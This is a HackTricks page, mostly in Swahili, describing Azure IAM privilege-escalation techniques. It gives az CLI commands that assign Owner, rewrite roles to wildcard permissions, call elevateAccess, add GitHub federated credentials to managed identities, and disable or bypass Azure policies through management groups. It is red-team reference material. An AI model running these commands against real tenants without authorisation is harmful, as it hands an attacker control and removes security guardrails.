Az - Azure IAM Privesc (Authorization)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure IAM

Kwa maelezo zaidi angalia:

Az - Entra ID (AzureAD) & Azure IAM

Microsoft.Authorization/roleAssignments/write

Ruhusa hii inaruhusu kuteua roles kwa principals ndani ya scope maalum, na hivyo kumruhusu mshambulizi kuinua idhini kwa kujipa role yenye idhini kubwa zaidi:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Ruhusa hii inaruhusu kubadilisha permissions zilizotolewa kwa role, na kumruhusu mshambuliaji to escalate privileges kwa kumpa role aliyemteua permissions zaidi.

Unda faili role.json na yaliyomo yafuatayo:

{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
}

Kisha sasisha role permissions kwa kutumia ufafanuzi wa awali ukiita:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Ruhusa hii inaruhusu kuinua vibali na kuweza kutoa ruhusa kwa principal yoyote juu ya Azure resources. Imekusudiwa kupeanwa Entra ID Global Administrators ili nao waweze kusimamia ruhusa juu ya Azure resources.

Tip

Nadhani mtumiaji anahitaji kuwa Global Administrator katika Entra ID ili elevate call ifanye kazi.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

Ruhusa hii inaruhusu kuongeza Federated credentials kwa managed identities. Kwa mfano, kutoa upatikanaji kwa Github Actions katika repo kwa managed identity. Kisha, inaruhusu kupata managed identity yoyote iliyoainishwa na mtumiaji.

Mfano wa amri ya kutoa upatikanaji kwa repo katika Github kwa managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

Mshambuliaji mwenye ruhusa Microsoft.Authorization/policyAssignments/write au Microsoft.Authorization/policyAssignments/delete juu ya management group, subscription, au resource group anaweza kurekebisha au kufuta Azure policy assignments, kwa hivyo anaweza kuzima vikwazo vya usalama vinavyozuia shughuli maalum.

Hii inaruhusu kupata rasilimali au uwezo ambao awali ulikuwa umewalindwa na sera.

Futa policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Zima uteuzi wa sera:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

Thibitisha mabadiliko:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

Mshambuliaji mwenye ruhusa Microsoft.Authorization/policyDefinitions/write anaweza kubadilisha ufafanuzi wa sera za Azure, akibadilisha sheria zinazosimamia vikwazo vya usalama katika mazingira.

Kwa mfano, sera inayopunguza mikoa iliyoruhusiwa kwa ajili ya kuunda rasilimali inaweza kubadilishwa ili kuruhusu mkoa wowote, au athari ya sera inaweza kubadilishwa ili kuifanya isiwe na ufanisi.

Badilisha ufafanuzi wa sera:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Thibitisha mabadiliko:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

Mshambulizi mwenye ruhusa Microsoft.Management/managementGroups/write anaweza kubadilisha muundo wa kimnara wa management groups au kuunda management groups mpya, na hivyo kukwepa sera kali zilizowekwa kwenye ngazi za juu.

Kwa mfano, mshambulizi anaweza kuunda management group mpya bila sera kali kisha kuhamisha subscriptions kwenye hiyo group.

Unda management group mpya:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Badilisha hierarkia ya kundi la usimamizi:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Thibitisha mabadiliko:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

Mshambuliaji mwenye ruhusa Microsoft.Management/managementGroups/subscriptions/write anaweza kuhamisha subscriptions kati ya management groups, na hivyo kuepuka sera za vizuizi kwa kuhamisha subscription kwenda group lenye sera ndogo au lisilo na sera.

Hamisha subscription kwenda management group tofauti:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Thibitisha mabadiliko:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks